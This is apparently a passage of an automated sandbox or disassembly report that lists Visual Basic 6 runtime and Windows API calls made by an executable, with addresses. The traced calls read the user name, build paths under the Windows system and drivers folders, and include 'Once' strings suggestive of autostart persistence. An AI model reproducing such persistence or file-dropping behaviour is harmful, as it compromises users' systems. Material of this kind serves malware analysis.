                                                                                                                                                                                                                                                        • Part of subcall function 0041E9D0: #525.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041EA30
                                                                                                                                                                                                                                                        • Part of subcall function 0041E9D0: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EA3B
                                                                                                                                                                                                                                                        • Part of subcall function 0041E9D0: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041EA4C
                                                                                                                                                                                                                                                        • Part of subcall function 0041E9D0: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041EA61
                                                                                                                                                                                                                                                        • Part of subcall function 0041E9D0: GetUserNameA.ADVAPI32(00000000), ref: 0041EA6D
                                                                                                                                                                                                                                                        • Part of subcall function 0041E9D0: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041EA7B
                                                                                                                                                                                                                                                        • Part of subcall function 0041E9D0: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EA84
                                                                                                                                                                                                                                                        • Part of subcall function 0041E9D0: #537.MSVBVM60(00000000,?,00000001,?,?,?,00000000,Function_000032B6), ref: 0041EA99
                                                                                                                                                                                                                                                        • Part of subcall function 0041E9D0: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAA4
                                                                                                                                                                                                                                                        • Part of subcall function 0041E9D0: __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041EAAD
                                                                                                                                                                                                                                                        • Part of subcall function 0041E9D0: #616.MSVBVM60(?,-00000001,?,?,?,00000000,Function_000032B6), ref: 0041EABD
                                                                                                                                                                                                                                                        • Part of subcall function 0041E9D0: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAC8
                                                                                                                                                                                                                                                        • Part of subcall function 0041E9D0: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAD1
                                                                                                                                                                                                                                                        • Part of subcall function 0041E9D0: __vbaFreeStr.MSVBVM60(0041EB05,?,?,?,00000000,Function_000032B6), ref: 0041EAFE
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040BCBD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BCCA
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0040BCD3
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00000000,00000000), ref: 0040BCEE
                                                                                                                                                                                                                                                      • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0E4,00000000), ref: 0040BD61
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040BD7A
                                                                                                                                                                                                                                                      • #600.MSVBVM60(00000008,00000000), ref: 0040BD90
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0040BD9F
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 0040BDC1
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BDD6
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040BDEA
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BDF7
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BE07
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BE1F
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040BE33
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BE40
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BE50
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BE68
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040BE7A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040BE85
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040BE9A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0040BEA1
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040BEAC
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BEB9
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BEE9
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(system32\drivers\,00000000), ref: 0040BEFB
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040BF06
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040BF1B
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0040BF22
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040BF2D
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BF3A
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040BF52
                                                                                                                                                                                                                                                        • Part of subcall function 00415EC0: __vbaSetSystemError.MSVBVM60(6CF8D8B1,6CF7A323,00000000), ref: 00415F0F
                                                                                                                                                                                                                                                        • Part of subcall function 00415EC0: __vbaNew2.MSVBVM60(00406520,0042CC34,6CF8D8B1,6CF7A323,00000000), ref: 00415F27
                                                                                                                                                                                                                                                        • Part of subcall function 00415EC0: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014), ref: 00415F4C
                                                                                                                                                                                                                                                        • Part of subcall function 00415EC0: __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000100), ref: 00415F76
                                                                                                                                                                                                                                                        • Part of subcall function 00415EC0: __vbaSetSystemError.MSVBVM60(0000000D,00416130,?,00000000), ref: 00415F8F
                                                                                                                                                                                                                                                        • Part of subcall function 00415EC0: __vbaFreeObj.MSVBVM60 ref: 00415F9E
                                                                                                                                                                                                                                                        • Part of subcall function 00416000: __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00416050
                                                                                                                                                                                                                                                        • Part of subcall function 00416000: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00416075
                                                                                                                                                                                                                                                        • Part of subcall function 00416000: __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000100,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041609F
                                                                                                                                                                                                                                                        • Part of subcall function 00416000: __vbaSetSystemError.MSVBVM60(0000000E,00417A20,?,00000000,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 004160B8
                                                                                                                                                                                                                                                        • Part of subcall function 00416000: __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 004160C7
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040BF8E
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407978,0000005C), ref: 0040BFD4
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0040BFEF
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040C008
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C013
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C021
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C02C
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040C038
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C043
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C050
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C05B
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00000000), ref: 0040C088
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040C0B2
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C0BD
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C0CB
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C0D6
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040C0E2
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C0ED
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C0FB
                                                                                                                                                                                                                                                      • #600.MSVBVM60(?,00000002), ref: 0040C111
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040C12B
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0040C137
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040C2F3
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040C300
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C310
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(0000001C), ref: 0040C32C
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040C339
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0040C342
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040C357
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040C36B
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040C378
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C388
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C3A5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C3B0
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040C3BD
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0040C3C6
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040C3DB
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040C3EF
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040C3FC
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C40C
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 0040C423
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,-00000001), ref: 0040C439
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C444
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040C451
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0040C45A
                                                                                                                                                                                                                                                      • #709.MSVBVM60(00000000,00406544,000000FF,00000000), ref: 0040C477
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,?,0000000A), ref: 0040C4AC
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C4B7
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040C4C4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0040C4CD
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0040C4D6
                                                                                                                                                                                                                                                      • #611.MSVBVM60 ref: 0040C4E3
                                                                                                                                                                                                                                                      • #661.MSVBVM60(?,00407C78,00000000,40000000,00000008), ref: 0040C507
                                                                                                                                                                                                                                                      • #705.MSVBVM60(?,00000004), ref: 0040C513
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C51E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(at ), ref: 0040C542
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0040C549
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C554
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C561
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C56C
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C57A
                                                                                                                                                                                                                                                      • #600.MSVBVM60(00000008,00000000), ref: 0040C590
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000), ref: 0040C5AE
                                                                                                                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,00000008,?,00000008), ref: 0040C5C5
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C5E9
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00407978,0000005C), ref: 0040C62F
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0040C64A
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040C664
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040C678
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040C686
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040C69A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00407CC4), ref: 0040C6CE
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000000), ref: 0040C6DE
                                                                                                                                                                                                                                                      • #690.MSVBVM60(00000000,00000000), ref: 0040C6EC
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,00000000,00000000), ref: 0040C70C
                                                                                                                                                                                                                                                      • #537.MSVBVM60(000000A0,00000000), ref: 0040C727
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C732
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0040C739
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C744
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406BFC,00000000,00000000), ref: 0040C757
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C762
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C770
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C77B
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,0040C78D,00000000,00000000), ref: 004218EE
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042191B
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00421927
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00421933
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00421942
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: #648.MSVBVM60(0000000A), ref: 00421961
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaFreeVar.MSVBVM60 ref: 00421970
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaI2I4.MSVBVM60(?), ref: 00421984
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00421992
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaI2I4.MSVBVM60 ref: 004219A2
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: #570.MSVBVM60(00000000), ref: 004219A9
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004219B6
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004219ED
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: #525.MSVBVM60(00000000), ref: 004219F4
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaStrMove.MSVBVM60 ref: 004219FF
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaI2I4.MSVBVM60 ref: 00421A0F
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00421A1A
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaI2I4.MSVBVM60 ref: 00421A2A
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00421A37
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaStrCopy.MSVBVM60 ref: 00421A4C
                                                                                                                                                                                                                                                        • Part of subcall function 004218D0: __vbaStrMove.MSVBVM60(?), ref: 00421A60
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00000000,00000000), ref: 0040C7A6
                                                                                                                                                                                                                                                      • __vbaEnd.MSVBVM60 ref: 0040C7C1
                                                                                                                                                                                                                                                      • #535.MSVBVM60(00000000), ref: 0040C7F1
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00407CCC), ref: 0040C81D
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C828
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000), ref: 0040C834
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C83F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C84D
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C858
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000), ref: 0040C864
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040C86F
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00000000), ref: 0040C88D
                                                                                                                                                                                                                                                      • #598.MSVBVM60(0042C0D4), ref: 0040C8AE
                                                                                                                                                                                                                                                      • #580.MSVBVM60(00000000,00000027), ref: 0040C908
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(00000000), ref: 0040C91D
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040C931
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040C93F
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040C953
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00407CC4), ref: 0040C987
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000000), ref: 0040C997
                                                                                                                                                                                                                                                      • #690.MSVBVM60(00000000,00000000), ref: 0040C9A4
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,00000000,00000000), ref: 0040C9C4
                                                                                                                                                                                                                                                      • #600.MSVBVM60(00004008,00000000), ref: 0040C9F1
                                                                                                                                                                                                                                                      • __vbaEnd.MSVBVM60 ref: 0040CA04
                                                                                                                                                                                                                                                        • Part of subcall function 00429E10: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CBB8,80000002,00000000,00000000), ref: 00429E2E
                                                                                                                                                                                                                                                        • Part of subcall function 00429E10: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429E5B
                                                                                                                                                                                                                                                        • Part of subcall function 00429E10: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429E67
                                                                                                                                                                                                                                                        • Part of subcall function 00429E10: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00429E76
                                                                                                                                                                                                                                                        • Part of subcall function 00429E10: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429E8F
                                                                                                                                                                                                                                                        • Part of subcall function 00429E10: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 00429E9F
                                                                                                                                                                                                                                                        • Part of subcall function 00429E10: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429EAD
                                                                                                                                                                                                                                                        • Part of subcall function 00429E10: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429EB6
                                                                                                                                                                                                                                                        • Part of subcall function 00429E10: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429ECB
                                                                                                                                                                                                                                                        • Part of subcall function 00429E10: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429EDB
                                                                                                                                                                                                                                                        • Part of subcall function 00429E10: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429EE9
                                                                                                                                                                                                                                                        • Part of subcall function 00429E10: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429EF2
                                                                                                                                                                                                                                                        • Part of subcall function 00429E10: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429F08
                                                                                                                                                                                                                                                        • Part of subcall function 00429E10: __vbaFreeStr.MSVBVM60(00429F32,?,?,?,00000000,004032B6), ref: 00429F22
                                                                                                                                                                                                                                                        • Part of subcall function 00429E10: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429F2B
                                                                                                                                                                                                                                                      • #580.MSVBVM60(00000000,00000027), ref: 0040CA1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( RO,00000000), ref: 0040CA32
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CA3D
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040CA57
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CA62
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000), ref: 0040CA7D
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( RO,00000000), ref: 0040CA99
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CAA4
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040CABD
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CAC8
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000), ref: 0040CAE3
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040BED1
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(6D076537,00000000,00000000), ref: 00425A0A
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00000000,00000000), ref: 0040C157
                                                                                                                                                                                                                                                      • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0E4,00000000), ref: 0040C1B9
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( PR,00000000,00000000), ref: 0040C1D2
                                                                                                                                                                                                                                                      • #600.MSVBVM60(00000008,00000000), ref: 0040C1E8
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0040C1F7
                                                                                                                                                                                                                                                      • __vbaNew.MSVBVM60(004075DC), ref: 0040C209
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C214
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000730), ref: 0040C250
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0040C26B
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040C296
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040C2AA
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040C2B7
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C2C7
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040C2DF
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 00422A8B
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?,00000000), ref: 00422AA0
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrCmp.MSVBVM60(00000000), ref: 00422AA7
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00422ACE
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422AF4
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000004), ref: 00422B15
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #618.MSVBVM60(00000000), ref: 00422B1C
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 00422B27
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI4Str.MSVBVM60(00000000), ref: 00422B2E
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00422B45
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422B78
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFileClose.MSVBVM60(00000000), ref: 00422B7F
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFreeStr.MSVBVM60(00422BC8), ref: 00422BB8
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFreeStr.MSVBVM60 ref: 00422BC1
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000), ref: 0040B52E
